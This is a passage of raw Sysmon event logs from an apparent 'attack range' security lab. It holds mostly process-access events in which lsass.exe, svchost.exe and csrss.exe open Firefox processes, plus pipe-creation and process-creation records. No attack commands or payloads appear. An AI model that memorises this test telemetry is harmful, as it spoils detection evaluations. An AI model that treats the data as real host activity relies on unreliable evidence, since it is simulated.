Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.090{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.090{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.090{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000042279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:41.088{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.1.194832155C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.025{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.025{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.009{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.009{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.009{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.009{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.009{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.009{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.009{FE4C2B44-E48F-63C7-3106-00000000AF02}32963116C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+186e3eb|C:\Program Files\Mozilla Firefox\xul.dll+9e34c6|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.010{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.0.1710590911\1242902203" -parentBuildID 20230112150232 -prefsHandle 1316 -prefMapHandle 1308 -prefsLen 25811 -prefMapSize 234522 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8a0462f-47cc-4c72-880b-a76fe134adaa} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 1396 1fb3c53f758 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 17141700x800000000000000042268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:41.009{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.0.171059091C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:40.994{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko-crash-server-pipe.3296C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000016727Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.777{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016726Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.770{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016725Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.768{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016724Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.760{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016723Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.755{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program 